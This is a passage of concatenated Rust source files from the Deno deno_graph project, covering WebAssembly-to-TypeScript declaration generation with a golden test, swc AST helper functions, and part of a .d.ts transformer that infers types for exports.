      // Emits `declare const <name>: <type>;` for non-function exports.
      let mut add_var = |type_text: &'static str| {
        builder.append("declare const ");
        write_export_name(builder, export, has_valid_export_ident, i);
        builder.append(": ");
        builder.append(type_text);
        builder.append(";\n");
      };
      match &export.export_type {
        wasm_dep_analyzer::ExportType::Function(function_signature) => {
          match function_signature {
            Ok(signature) => {
              builder.append("declare function ");
              write_export_name(builder, export, has_valid_export_ident, i);
              builder.append('(');
              for (i, param) in signature.params.iter().enumerate() {
                if i > 0 {
                  builder.append(", ");
                }
                builder.append("arg");
                builder.append(i);
                builder.append(": ");
                builder
                  .append(value_type_to_ts_type(*param, TypePosition::Input));
              }
              builder.append("): ");
              // Only the first return value is surfaced; no returns => void.
              builder.append(
                signature
                  .returns
                  .first()
                  .map(|t| value_type_to_ts_type(*t, TypePosition::Output))
                  .unwrap_or("void"),
              );
              builder.append(";\n");
            }
            Err(_) => add_var("unknown"),
          }
        }
        wasm_dep_analyzer::ExportType::Table => add_var("WebAssembly.Table"),
        wasm_dep_analyzer::ExportType::Memory => add_var("WebAssembly.Memory"),
        wasm_dep_analyzer::ExportType::Global(global_type) => match global_type
        {
          Ok(global_type) => add_var(value_type_to_ts_type(
            global_type.value_type,
            TypePosition::Output,
          )),
          Err(_) => add_var("unknown"),
        },
        wasm_dep_analyzer::ExportType::Tag
        | wasm_dep_analyzer::ExportType::Unknown => add_var("unknown"),
      }
      if !has_valid_export_ident {
        builder.append("export { ");
        write_export_name(builder, export, has_valid_export_ident, i);
        builder.append(" as \"");
        builder.append(export.name);
        builder.append("\" };\n");
      }
    }
  })
  .unwrap()
}
#[cfg(test)]
mod test {
  use pretty_assertions::assert_eq;
  use wasm_dep_analyzer::Export;
  use wasm_dep_analyzer::FunctionSignature;
  use wasm_dep_analyzer::Import;
  use wasm_dep_analyzer::WasmDeps;
  use super::*;
  // Golden test: covers import grouping, every export kind, and the quoting
  // of export names that are not valid identifiers.
  #[test]
  fn test_output() {
    let text = wasm_module_deps_to_dts(&WasmDeps {
      imports: vec![
        Import {
          name: "name1",
          module: "./mod.ts",
          import_type: wasm_dep_analyzer::ImportType::Function(0),
        },
        Import {
          name: "name1",
          module: "./other.ts",
          import_type: wasm_dep_analyzer::ImportType::Function(0),
        },
        Import {
          name: "name2",
          module: "./mod.ts",
          import_type: wasm_dep_analyzer::ImportType::Function(0),
        },
      ],
      exports: vec![
        Export {
          name: "name--1",
          index: 0,
          export_type: wasm_dep_analyzer::ExportType::Function(Ok(
            FunctionSignature {
              params: vec![],
              returns: vec![],
            },
          )),
        },
        Export {
          name: "name2",
          index: 1,
          export_type: wasm_dep_analyzer::ExportType::Function(Ok(
            FunctionSignature {
              params: vec![ValueType::I32, ValueType::I64],
              returns: vec![ValueType::I64],
            },
          )),
        },
        Export {
          name: "name3",
          index: 2,
          export_type: wasm_dep_analyzer::ExportType::Function(Err(
            wasm_dep_analyzer::ParseError::IntegerOverflow,
          )),
        },
        Export {
          name: "name4",
          index: 3,
          export_type: wasm_dep_analyzer::ExportType::Table,
        },
        Export {
          name: "name5",
          index: 4,
          export_type: wasm_dep_analyzer::ExportType::Memory,
        },
        Export {
          name: "name6",
          index: 5,
          export_type: wasm_dep_analyzer::ExportType::Global(Ok(
            wasm_dep_analyzer::GlobalType {
              value_type: ValueType::I32,
              mutability: false,
            },
          )),
        },
        Export {
          name: "name7",
          index: 6,
          export_type: wasm_dep_analyzer::ExportType::Global(Err(
            wasm_dep_analyzer::ParseError::NotWasm,
          )),
        },
        Export {
          name: "name8",
          index: 7,
          export_type: wasm_dep_analyzer::ExportType::Unknown,
        },
        Export {
          name: "name9--",
          index: 8,
          export_type: wasm_dep_analyzer::ExportType::Unknown,
        },
        Export {
          name: "default",
          index: 9,
          export_type: wasm_dep_analyzer::ExportType::Unknown,
        },
      ],
    });
    assert_eq!(
      text,
      "import { \"name1\" as __deno_wasm_import_0__, \"name2\" as __deno_wasm_import_1__ } from \"./mod.ts\";
import { \"name1\" as __deno_wasm_import_2__ } from \"./other.ts\";
declare function __deno_wasm_export_0__(): void;
export { __deno_wasm_export_0__ as \"name--1\" };
export declare function name2(arg0: number, arg1: bigint | number): bigint;
export declare const name3: unknown;
export declare const name4: WebAssembly.Table;
export declare const name5: WebAssembly.Memory;
export declare const name6: number;
export declare const name7: unknown;
export declare const name8: unknown;
declare const __deno_wasm_export_8__: unknown;
export { __deno_wasm_export_8__ as \"name9--\" };
declare const __deno_wasm_export_9__: unknown;
export { __deno_wasm_export_9__ as \"default\" };
"
    );
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/fast_check/swc_helpers.rs | src/fast_check/swc_helpers.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::ops::ControlFlow;
use deno_ast::swc::ast::*;
use deno_ast::swc::atoms::Atom;
use deno_ast::swc::common::DUMMY_SP;
use deno_ast::swc::common::SyntaxContext;
pub fn new_ident(name: Atom) -> Ident {
Ident {
span: DUMMY_SP,
ctxt: Default::default(),
sym: name,
optional: false,
}
}
/// Wraps a keyword kind (e.g. `number`, `void`) in a `TsType`.
pub fn ts_keyword_type(kind: TsKeywordTypeKind) -> TsType {
  let keyword = TsKeywordType {
    span: DUMMY_SP,
    kind,
  };
  TsType::TsKeywordType(keyword)
}
/// Classification of the `return` statements found in a function body, used
/// to decide how the function's return type should be inferred.
#[derive(Debug)]
pub enum ReturnStatementAnalysis {
  /// There are no return statements in the function body.
  None,
  /// There are only return statements without arguments in the function body,
  /// or if the function body is empty.
  Void,
  /// There is only a single return statement in the function body, and it has
  /// an argument.
  Single,
  /// There are multiple return statements in the function body, and at least
  /// one of them has an argument.
  Multiple,
}
/// Classifies the `return` statements in a function body.
///
/// An empty body is treated the same as one containing only bare `return`s.
pub fn analyze_return_stmts_in_function_body(
  body: &deno_ast::swc::ast::BlockStmt,
) -> ReturnStatementAnalysis {
  if body.stmts.is_empty() {
    return ReturnStatementAnalysis::Void;
  }
  let mut analysis = ReturnStatementAnalysis::None;
  // The ControlFlow result only signals early termination; the answer
  // accumulates in `analysis`.
  let _ = analyze_return_stmts_from_stmts(&body.stmts, &mut analysis);
  analysis
}
/// Folds every statement into `analysis`, stopping as soon as the
/// classification can no longer change.
fn analyze_return_stmts_from_stmts(
  stmts: &[Stmt],
  analysis: &mut ReturnStatementAnalysis,
) -> ControlFlow<(), ()> {
  for stmt in stmts {
    if analyze_return_stmts_from_stmt(stmt, analysis).is_break() {
      return ControlFlow::Break(());
    }
  }
  ControlFlow::Continue(())
}
/// Updates `analysis` for a single statement, recursing into nested blocks,
/// loops, labeled statements, `switch` cases and `try` clauses.
///
/// Nested function/class bodies are not visited — a `return` inside them
/// belongs to the inner function. Breaks out early once `Multiple` is
/// reached since the classification can no longer change.
fn analyze_return_stmts_from_stmt(
  stmt: &Stmt,
  analysis: &mut ReturnStatementAnalysis,
) -> ControlFlow<(), ()> {
  match stmt {
    Stmt::Block(n) => analyze_return_stmts_from_stmts(&n.stmts, analysis),
    Stmt::With(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
    Stmt::Return(n) => {
      // State machine: None -> Void (bare return) / Single (valued return),
      // and any further return after Single -> Multiple.
      match (&n.arg, &*analysis) {
        (None, ReturnStatementAnalysis::None) => {
          *analysis = ReturnStatementAnalysis::Void;
        }
        (None, ReturnStatementAnalysis::Void) => {}
        (Some(_), ReturnStatementAnalysis::None)
        | (Some(_), ReturnStatementAnalysis::Void) => {
          *analysis = ReturnStatementAnalysis::Single;
        }
        (_, ReturnStatementAnalysis::Single) => {
          *analysis = ReturnStatementAnalysis::Multiple;
          return ControlFlow::Break(());
        }
        (_, ReturnStatementAnalysis::Multiple) => unreachable!(), // we break early when analysis is Multiple
      }
      ControlFlow::Continue(())
    }
    Stmt::Labeled(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
    // NOTE(review): only the consequent is visited; `n.alt` (the `else`
    // branch) is not — confirm this is intentional.
    Stmt::If(n) => analyze_return_stmts_from_stmt(&n.cons, analysis),
    Stmt::Switch(n) => {
      for case in &n.cases {
        analyze_return_stmts_from_stmts(&case.cons, analysis)?;
      }
      ControlFlow::Continue(())
    }
    Stmt::Try(n) => {
      analyze_return_stmts_from_stmts(&n.block.stmts, analysis)?;
      if let Some(n) = &n.handler {
        analyze_return_stmts_from_stmts(&n.body.stmts, analysis)?;
      }
      if let Some(n) = &n.finalizer {
        analyze_return_stmts_from_stmts(&n.stmts, analysis)?;
      }
      ControlFlow::Continue(())
    }
    Stmt::While(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
    Stmt::DoWhile(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
    Stmt::For(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
    Stmt::ForIn(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
    Stmt::ForOf(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
    Stmt::Break(_)
    | Stmt::Continue(_)
    | Stmt::Throw(_)
    | Stmt::Debugger(_)
    | Stmt::Decl(_)
    | Stmt::Expr(_)
    | Stmt::Empty(_) => ControlFlow::Continue(()),
  }
}
pub fn is_void_type(return_type: &TsType) -> bool {
is_keyword_type(return_type, TsKeywordTypeKind::TsVoidKeyword)
}
/// Returns `true` when the type is the given keyword type.
fn is_keyword_type(return_type: &TsType, kind: TsKeywordTypeKind) -> bool {
  matches!(
    return_type,
    TsType::TsKeywordType(TsKeywordType { kind: k, .. }) if *k == kind
  )
}
/// A boxed type annotation of `any`.
pub fn any_type_ann() -> Box<TsTypeAnn> {
  let any = ts_keyword_type(TsKeywordTypeKind::TsAnyKeyword);
  type_ann(any)
}
/// Wraps `ann` in the `readonly` type operator.
pub fn ts_readonly(ann: TsType) -> TsType {
  let operator = TsTypeOperator {
    span: DUMMY_SP,
    op: TsTypeOperatorOp::ReadOnly,
    type_ann: Box::new(ann),
  };
  TsType::TsTypeOperator(operator)
}
/// Boxes a type into a `TsTypeAnn` with a dummy span.
pub fn type_ann(ts_type: TsType) -> Box<TsTypeAnn> {
  let ann = TsTypeAnn {
    span: DUMMY_SP,
    type_ann: Box::new(ts_type),
  };
  Box::new(ann)
}
/// Builds a bare type reference (e.g. `RegExp`) with no type arguments.
pub fn type_ref(name: Atom) -> TsTypeRef {
  let ident = Ident::new(name, DUMMY_SP, SyntaxContext::default());
  TsTypeRef {
    span: DUMMY_SP,
    type_name: TsEntityName::Ident(ident),
    type_params: None,
  }
}
/// Wraps a literal in a literal type with a dummy span.
pub fn ts_lit_type(lit: TsLit) -> TsType {
  let lit_type = TsLitType {
    span: DUMMY_SP,
    lit,
  };
  TsType::TsLitType(lit_type)
}
/// The `RegExp` reference type.
pub fn regex_type() -> TsType {
  let reference = type_ref("RegExp".into());
  TsType::TsTypeRef(reference)
}
/// Wraps a type as an unlabeled tuple element.
pub fn ts_tuple_element(ts_type: TsType) -> TsTupleElement {
  TsTupleElement {
    span: DUMMY_SP,
    label: None,
    ty: Box::new(ts_type),
  }
}
/// Whether a declaration's initializer should be typed as a narrow literal
/// type (`const` bindings) or widened to its general type (mutable bindings).
pub enum DeclMutabilityKind {
  // `const` declaration: literals narrow to literal types.
  Const,
  // `let`/`var` or otherwise mutable: literals widen to keyword types.
  Mutable,
}
pub fn maybe_lit_to_ts_type(
lit: &Lit,
decl_kind: DeclMutabilityKind,
) -> Option<TsType> {
match decl_kind {
DeclMutabilityKind::Const => match lit {
Lit::Str(lit_str) => Some(ts_lit_type(TsLit::Str(lit_str.clone()))),
Lit::Bool(lit_bool) => Some(ts_lit_type(TsLit::Bool(*lit_bool))),
Lit::Null(_) => Some(ts_keyword_type(TsKeywordTypeKind::TsNullKeyword)),
Lit::Num(lit_num) => Some(ts_lit_type(TsLit::Number(lit_num.clone()))),
Lit::BigInt(lit_bigint) => {
Some(ts_lit_type(TsLit::BigInt(lit_bigint.clone())))
}
Lit::Regex(_) => Some(regex_type()),
Lit::JSXText(_) => None,
},
DeclMutabilityKind::Mutable => match lit {
Lit::Str(_) => Some(ts_keyword_type(TsKeywordTypeKind::TsStringKeyword)),
Lit::Bool(_) => {
Some(ts_keyword_type(TsKeywordTypeKind::TsBooleanKeyword))
}
Lit::Null(_) => Some(ts_keyword_type(TsKeywordTypeKind::TsNullKeyword)),
Lit::Num(_) => Some(ts_keyword_type(TsKeywordTypeKind::TsNumberKeyword)),
Lit::BigInt(_) => {
Some(ts_keyword_type(TsKeywordTypeKind::TsBigIntKeyword))
}
Lit::Regex(_) => Some(regex_type()),
Lit::JSXText(_) => None,
},
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/fast_check/transform_dts.rs | src/fast_check/transform_dts.rs | use deno_ast::ModuleSpecifier;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::SourceTextInfo;
use deno_ast::swc::ast::*;
use deno_ast::swc::common::DUMMY_SP;
use deno_ast::swc::common::SyntaxContext;
use super::FastCheckDiagnosticRange;
use super::range_finder::ModulePublicRanges;
use super::swc_helpers::DeclMutabilityKind;
use super::swc_helpers::any_type_ann;
use super::swc_helpers::maybe_lit_to_ts_type;
use super::swc_helpers::ts_readonly;
use super::swc_helpers::ts_tuple_element;
use super::swc_helpers::type_ann;
/// Diagnostics emitted while generating `.d.ts` output; each variant carries
/// the source range of the construct that could not be fully handled.
#[derive(Debug, Clone, thiserror::Error)]
pub enum FastCheckDtsDiagnostic {
  #[error("unable to infer type from expression or declaration")]
  UnableToInferType { range: FastCheckDiagnosticRange },
  #[error("unable to infer type, falling back to any type")]
  UnableToInferTypeFallbackAny { range: FastCheckDiagnosticRange },
  #[error("unable to infer type from object property, skipping")]
  UnableToInferTypeFromProp { range: FastCheckDiagnosticRange },
  #[error("unable to infer type from spread, skipping")]
  UnableToInferTypeFromSpread { range: FastCheckDiagnosticRange },
  #[error("cannot infer type from using, skipping")]
  UnsupportedUsing { range: FastCheckDiagnosticRange },
}
impl FastCheckDtsDiagnostic {
  /// The specifier of the module the diagnostic was raised in.
  pub fn specifier(&self) -> &ModuleSpecifier {
    // Every variant stores its specifier inside its range, so delegate to
    // `range()` instead of repeating the per-variant match.
    &self.range().specifier
  }

  /// The source range the diagnostic points at.
  pub fn range(&self) -> &FastCheckDiagnosticRange {
    match self {
      FastCheckDtsDiagnostic::UnableToInferType { range } => range,
      FastCheckDtsDiagnostic::UnableToInferTypeFallbackAny { range } => range,
      FastCheckDtsDiagnostic::UnableToInferTypeFromProp { range } => range,
      FastCheckDtsDiagnostic::UnableToInferTypeFromSpread { range } => range,
      FastCheckDtsDiagnostic::UnsupportedUsing { range } => range,
    }
  }
}
/// Transforms a module's AST into a `.d.ts`-shaped AST by stripping bodies
/// and inferring type annotations where required.
pub struct FastCheckDtsTransformer<'a> {
  // Counter used to generate unique synthetic identifiers (`_dts_<n>`).
  id_counter: usize,
  text_info: &'a SourceTextInfo,
  public_ranges: &'a ModulePublicRanges,
  // Diagnostics collected during the transform; inspect after `transform()`.
  pub diagnostics: Vec<FastCheckDtsDiagnostic>,
  specifier: &'a ModuleSpecifier,
  // Whether processing is currently at module top level (affects `declare`).
  is_top_level: bool,
}
impl<'a> FastCheckDtsTransformer<'a> {
pub fn new(
text_info: &'a SourceTextInfo,
public_ranges: &'a ModulePublicRanges,
specifier: &'a ModuleSpecifier,
) -> Self {
Self {
id_counter: 0,
text_info,
specifier,
public_ranges,
diagnostics: vec![],
is_top_level: true,
}
}
fn gen_unique_name(&mut self) -> String {
self.id_counter += 1;
format!("_dts_{}", self.id_counter)
}
  /// Records a diagnostic for later reporting.
  fn mark_diagnostic(&mut self, diagnostic: FastCheckDtsDiagnostic) {
    self.diagnostics.push(diagnostic)
  }
fn source_range_to_range(
&self,
range: SourceRange,
) -> FastCheckDiagnosticRange {
FastCheckDiagnosticRange {
specifier: self.specifier.clone(),
text_info: self.text_info.clone(),
range,
}
}
fn mark_diagnostic_unable_to_infer(&mut self, range: SourceRange) {
self.mark_diagnostic(FastCheckDtsDiagnostic::UnableToInferType {
range: self.source_range_to_range(range),
})
}
fn mark_diagnostic_any_fallback(&mut self, range: SourceRange) {
self.mark_diagnostic(FastCheckDtsDiagnostic::UnableToInferTypeFallbackAny {
range: self.source_range_to_range(range),
})
}
fn mark_diagnostic_unsupported_prop(&mut self, range: SourceRange) {
self.mark_diagnostic(FastCheckDtsDiagnostic::UnableToInferTypeFromProp {
range: self.source_range_to_range(range),
})
}
pub fn transform(&mut self, program: Program) -> Program {
self.is_top_level = true;
match program {
Program::Module(mut module) => {
let body = module.body;
module.body = self.transform_module_items(body);
Program::Module(module)
}
Program::Script(mut script) => {
script.body = script
.body
.into_iter()
.filter_map(|stmt| {
let new_stmt = self.transform_module_stmt(stmt)?;
Some(new_stmt)
})
.collect();
Program::Script(script)
}
}
}
  /// Transforms the items of a module (or namespace body) for declaration
  /// output, dropping overload implementation signatures and converting
  /// default-exported expressions into a typed synthetic `const`.
  fn transform_module_items(
    &mut self,
    body: Vec<ModuleItem>,
  ) -> Vec<ModuleItem> {
    let mut new_items: Vec<ModuleItem> = vec![];
    for item in body {
      match item {
        ModuleItem::ModuleDecl(module_decl) => match module_decl {
          ModuleDecl::Import(_) => {
            new_items.push(ModuleItem::ModuleDecl(module_decl));
          }
          ModuleDecl::ExportDecl(export_decl) => {
            if let Decl::Fn(_) = &export_decl.decl
              && self
                .public_ranges
                .is_impl_with_overloads(&export_decl.range())
            {
              continue; // skip implementation signature
            }
            match self.decl_to_type_decl(export_decl.decl.clone()) {
              Some(decl) => {
                new_items.push(ModuleItem::ModuleDecl(ModuleDecl::ExportDecl(
                  ExportDecl {
                    decl,
                    span: export_decl.span,
                  },
                )));
              }
              _ => self.mark_diagnostic(
                FastCheckDtsDiagnostic::UnableToInferType {
                  range: self.source_range_to_range(export_decl.range()),
                },
              ),
            }
          }
          ModuleDecl::ExportDefaultDecl(export_decl) => {
            let value = match export_decl.decl {
              DefaultDecl::Class(mut class_expr) => {
                class_expr.class.body =
                  self.class_body_to_type(class_expr.class.body);
                ExportDefaultDecl {
                  span: export_decl.span,
                  decl: DefaultDecl::Class(class_expr),
                }
              }
              DefaultDecl::Fn(mut fn_expr) => {
                if self
                  .public_ranges
                  .is_impl_with_overloads(&export_decl.span.range())
                {
                  continue; // skip implementation signature
                }
                // Declarations never carry function bodies.
                fn_expr.function.body = None;
                ExportDefaultDecl {
                  span: export_decl.span,
                  decl: DefaultDecl::Fn(fn_expr),
                }
              }
              DefaultDecl::TsInterfaceDecl(_) => export_decl,
            };
            new_items.push(ModuleItem::ModuleDecl(
              ModuleDecl::ExportDefaultDecl(value),
            ))
          }
          ModuleDecl::ExportDefaultExpr(export_default_expr) => {
            // `export default <expr>` needs a type; synthesize a typed
            // `declare const _dts_<n>` and default-export that identifier.
            let name = self.gen_unique_name();
            let name_ident =
              Ident::new(name.into(), DUMMY_SP, SyntaxContext::default());
            let type_ann = self
              .expr_to_ts_type(*export_default_expr.expr.clone(), false, true)
              .map(type_ann);
            if let Some(type_ann) = type_ann {
              new_items.push(ModuleItem::Stmt(Stmt::Decl(Decl::Var(
                Box::new(VarDecl {
                  span: DUMMY_SP,
                  ctxt: Default::default(),
                  kind: VarDeclKind::Const,
                  declare: true,
                  decls: vec![VarDeclarator {
                    span: DUMMY_SP,
                    name: Pat::Ident(BindingIdent {
                      id: name_ident.clone(),
                      type_ann: Some(type_ann),
                    }),
                    init: None,
                    definite: false,
                  }],
                }),
              ))));
              new_items.push(ModuleItem::ModuleDecl(
                ModuleDecl::ExportDefaultExpr(ExportDefaultExpr {
                  span: export_default_expr.span,
                  expr: Box::new(Expr::Ident(name_ident)),
                }),
              ))
            } else {
              // No inferable type: keep the original expression untouched.
              new_items.push(ModuleItem::ModuleDecl(
                ModuleDecl::ExportDefaultExpr(ExportDefaultExpr {
                  span: export_default_expr.span,
                  expr: export_default_expr.expr,
                }),
              ))
            }
          }
          // Keep all these
          ModuleDecl::TsImportEquals(_)
          | ModuleDecl::TsNamespaceExport(_)
          | ModuleDecl::TsExportAssignment(_)
          | ModuleDecl::ExportNamed(_)
          | ModuleDecl::ExportAll(_) => {
            new_items.push(ModuleItem::ModuleDecl(module_decl));
          }
        },
        ModuleItem::Stmt(stmt) => {
          if let Some(new_stmt) = self.transform_module_stmt(stmt) {
            new_items.push(ModuleItem::Stmt(new_stmt));
          }
        }
      }
    }
    new_items
  }
fn transform_module_stmt(&mut self, stmt: Stmt) -> Option<Stmt> {
let Stmt::Decl(decl) = stmt else {
return None;
};
if let Decl::Fn(_) = &decl
&& self.public_ranges.is_impl_with_overloads(&decl.range())
{
return None; // skip implementation signature
}
match decl {
Decl::TsEnum(_)
| Decl::Class(_)
| Decl::Fn(_)
| Decl::Var(_)
| Decl::TsModule(_) => match self.decl_to_type_decl(decl.clone()) {
Some(decl) => Some(Stmt::Decl(decl)),
_ => {
self.mark_diagnostic_unable_to_infer(decl.range());
None
}
},
Decl::TsInterface(_) | Decl::TsTypeAlias(_) | Decl::Using(_) => {
Some(Stmt::Decl(decl))
}
}
}
  /// Attempts to infer a `TsType` from an expression for use in declaration
  /// output.
  ///
  /// `as_const` narrows literals to literal types (as under `as const`);
  /// `as_readonly` marks inferred tuples/object properties readonly. Returns
  /// `None` when no type can be inferred from the expression.
  fn expr_to_ts_type(
    &mut self,
    expr: Expr,
    as_const: bool,
    as_readonly: bool,
  ) -> Option<TsType> {
    match expr {
      // Arrays become tuple types, element by element.
      Expr::Array(arr) => {
        let mut elem_types: Vec<TsTupleElement> = vec![];
        for elems in arr.elems {
          if let Some(expr_or_spread) = elems {
            match self.expr_to_ts_type(
              *expr_or_spread.expr.clone(),
              as_const,
              as_readonly,
            ) {
              Some(ts_expr) => {
                elem_types.push(ts_tuple_element(ts_expr));
              }
              _ => {
                self.mark_diagnostic_unable_to_infer(expr_or_spread.range());
              }
            }
          } else {
            // TypeScript converts holey arrays to any
            // Example: const a = [,,] -> const a = [any, any, any]
            elem_types.push(ts_tuple_element(TsType::TsKeywordType(
              TsKeywordType {
                kind: TsKeywordTypeKind::TsAnyKeyword,
                span: DUMMY_SP,
              },
            )))
          }
        }
        let mut result = TsType::TsTupleType(TsTupleType {
          span: arr.span,
          elem_types,
        });
        if as_readonly {
          result = ts_readonly(result);
        }
        Some(result)
      }
      // Object literals become type literals; only key/value properties are
      // supported.
      Expr::Object(obj) => {
        let mut members: Vec<TsTypeElement> = vec![];
        // TODO: Prescan all object properties to know which ones
        // have a getter or a setter. This allows us to apply
        // TypeScript's `readonly` keyword accordingly.
        for item in obj.props {
          match item {
            PropOrSpread::Prop(prop_box) => {
              let prop = *prop_box;
              match prop {
                Prop::KeyValue(key_value) => {
                  let (key, computed) = match key_value.key {
                    PropName::Ident(ident_name) => (
                      Expr::Ident(Ident {
                        span: ident_name.span,
                        ctxt: SyntaxContext::default(),
                        sym: ident_name.sym,
                        optional: false,
                      }),
                      false,
                    ),
                    PropName::Str(str_prop) => {
                      (Expr::Lit(Lit::Str(str_prop)), false)
                    }
                    PropName::Num(num) => (Expr::Lit(Lit::Num(num)), true),
                    PropName::Computed(computed) => (*computed.expr, true),
                    PropName::BigInt(big_int) => {
                      (Expr::Lit(Lit::BigInt(big_int)), true)
                    }
                  };
                  let init_type = self
                    .expr_to_ts_type(*key_value.value, as_const, as_readonly)
                    .map(type_ann);
                  members.push(TsTypeElement::TsPropertySignature(
                    TsPropertySignature {
                      span: DUMMY_SP,
                      readonly: as_readonly,
                      key: Box::new(key),
                      computed,
                      optional: false,
                      type_ann: init_type,
                    },
                  ));
                }
                Prop::Shorthand(_)
                | Prop::Assign(_)
                | Prop::Getter(_)
                | Prop::Setter(_)
                | Prop::Method(_) => {
                  self.mark_diagnostic_unsupported_prop(prop.range());
                }
              }
            }
            PropOrSpread::Spread(_) => self.mark_diagnostic(
              FastCheckDtsDiagnostic::UnableToInferTypeFromSpread {
                range: self.source_range_to_range(item.range()),
              },
            ),
          }
        }
        Some(TsType::TsTypeLit(TsTypeLit {
          span: obj.span,
          members,
        }))
      }
      Expr::Lit(lit) => maybe_lit_to_ts_type(
        &lit,
        match as_const {
          true => DeclMutabilityKind::Const,
          false => DeclMutabilityKind::Mutable,
        },
      ),
      // `expr as const` forces narrow + readonly inference below it.
      Expr::TsConstAssertion(ts_const) => {
        self.expr_to_ts_type(*ts_const.expr, true, true)
      }
      Expr::TsSatisfies(satisifies) => {
        self.expr_to_ts_type(*satisifies.expr, as_const, as_readonly)
      }
      // `expr as T` supplies the type directly.
      Expr::TsAs(ts_as) => Some(*ts_as.type_ann),
      // Function and arrow expressions become function types; an unannotated
      // return type falls back to `any`.
      Expr::Fn(fn_expr) => {
        let return_type = fn_expr
          .function
          .return_type
          .map_or(any_type_ann(), |val| val);
        let params: Vec<TsFnParam> = fn_expr
          .function
          .params
          .into_iter()
          .filter_map(|param| self.pat_to_ts_fn_param(param.pat))
          .collect();
        Some(TsType::TsFnOrConstructorType(
          TsFnOrConstructorType::TsFnType(TsFnType {
            span: fn_expr.function.span,
            params,
            type_ann: return_type,
            type_params: fn_expr.function.type_params,
          }),
        ))
      }
      Expr::Arrow(arrow_expr) => {
        let return_type =
          arrow_expr.return_type.map_or(any_type_ann(), |val| val);
        let params = arrow_expr
          .params
          .into_iter()
          .filter_map(|pat| self.pat_to_ts_fn_param(pat))
          .collect();
        Some(TsType::TsFnOrConstructorType(
          TsFnOrConstructorType::TsFnType(TsFnType {
            span: arrow_expr.span,
            params,
            type_ann: return_type,
            type_params: arrow_expr.type_params,
          }),
        ))
      }
      // Since fast check requires explicit type annotations these
      // can be dropped as they are not part of an export declaration
      Expr::This(_)
      | Expr::Unary(_)
      | Expr::Update(_)
      | Expr::Bin(_)
      | Expr::Assign(_)
      | Expr::Member(_)
      | Expr::SuperProp(_)
      | Expr::Cond(_)
      | Expr::Call(_)
      | Expr::New(_)
      | Expr::Seq(_)
      | Expr::Ident(_)
      | Expr::Tpl(_)
      | Expr::TaggedTpl(_)
      | Expr::Class(_)
      | Expr::Yield(_)
      | Expr::MetaProp(_)
      | Expr::Await(_)
      | Expr::Paren(_)
      | Expr::JSXMember(_)
      | Expr::JSXNamespacedName(_)
      | Expr::JSXEmpty(_)
      | Expr::JSXElement(_)
      | Expr::JSXFragment(_)
      | Expr::TsTypeAssertion(_)
      | Expr::TsNonNull(_)
      | Expr::TsInstantiation(_)
      | Expr::PrivateName(_)
      | Expr::OptChain(_)
      | Expr::Invalid(_) => None,
    }
  }
fn decl_to_type_decl(&mut self, decl: Decl) -> Option<Decl> {
let is_declare = self.is_top_level;
match decl {
Decl::Class(mut class_decl) => {
class_decl.class.body = self.class_body_to_type(class_decl.class.body);
class_decl.declare = is_declare;
Some(Decl::Class(class_decl))
}
Decl::Fn(mut fn_decl) => {
fn_decl.function.body = None;
fn_decl.declare = is_declare;
self.handle_func_params(&mut fn_decl.function.params);
Some(Decl::Fn(fn_decl))
}
Decl::Var(mut var_decl) => {
var_decl.declare = is_declare;
for decl in &mut var_decl.decls {
if let Pat::Ident(ident) = &mut decl.name {
if ident.type_ann.is_some() {
decl.init = None;
continue;
}
let ts_type = decl
.init
.as_ref()
.and_then(|init_box| {
let init = *init_box.clone();
self.expr_to_ts_type(init, false, true)
})
.map(type_ann)
.or_else(|| {
self.mark_diagnostic_any_fallback(ident.range());
Some(any_type_ann())
});
ident.type_ann = ts_type;
} else {
self.mark_diagnostic_unable_to_infer(decl.range());
}
decl.init = None;
}
Some(Decl::Var(var_decl))
}
Decl::TsEnum(mut ts_enum) => {
ts_enum.declare = is_declare;
for member in &mut ts_enum.members {
if let Some(init) = &member.init {
// Support for expressions is limited in enums,
// see https://www.typescriptlang.org/docs/handbook/enums.html
member.init = if self.valid_enum_init_expr(*init.clone()) {
Some(init.clone())
} else {
None
};
}
}
Some(Decl::TsEnum(ts_enum))
}
Decl::TsModule(mut ts_module) => {
ts_module.declare = is_declare;
match ts_module.body.clone() {
Some(body) => {
ts_module.body = Some(self.transform_ts_ns_body(body));
Some(Decl::TsModule(ts_module))
}
_ => Some(Decl::TsModule(ts_module)),
}
}
Decl::TsInterface(_) | Decl::TsTypeAlias(_) => Some(decl),
Decl::Using(_) => {
self.mark_diagnostic(FastCheckDtsDiagnostic::UnsupportedUsing {
range: self.source_range_to_range(decl.range()),
});
None
}
}
}
fn transform_ts_ns_body(&mut self, ns: TsNamespaceBody) -> TsNamespaceBody {
let original_is_top_level = self.is_top_level;
self.is_top_level = false;
let body = match ns {
TsNamespaceBody::TsModuleBlock(mut ts_module_block) => {
ts_module_block.body =
self.transform_module_items(ts_module_block.body);
TsNamespaceBody::TsModuleBlock(ts_module_block)
}
TsNamespaceBody::TsNamespaceDecl(ts_ns) => {
self.transform_ts_ns_body(*ts_ns.body)
}
};
self.is_top_level = original_is_top_level;
body
}
// Support for expressions is limited in enums,
// see https://www.typescriptlang.org/docs/handbook/enums.html
fn valid_enum_init_expr(&mut self, expr: Expr) -> bool {
match expr {
Expr::Bin(bin_expr) => {
if !self.valid_enum_init_expr(*bin_expr.left) {
false
} else {
self.valid_enum_init_expr(*bin_expr.right)
}
}
Expr::Member(member_expr) => self.valid_enum_init_expr(*member_expr.obj),
Expr::OptChain(opt_expr) => match *opt_expr.base {
OptChainBase::Member(member_expr) => {
self.valid_enum_init_expr(Expr::Member(member_expr))
}
OptChainBase::Call(_) => false,
},
// TS does infer the type of identifiers
Expr::Ident(_) => true,
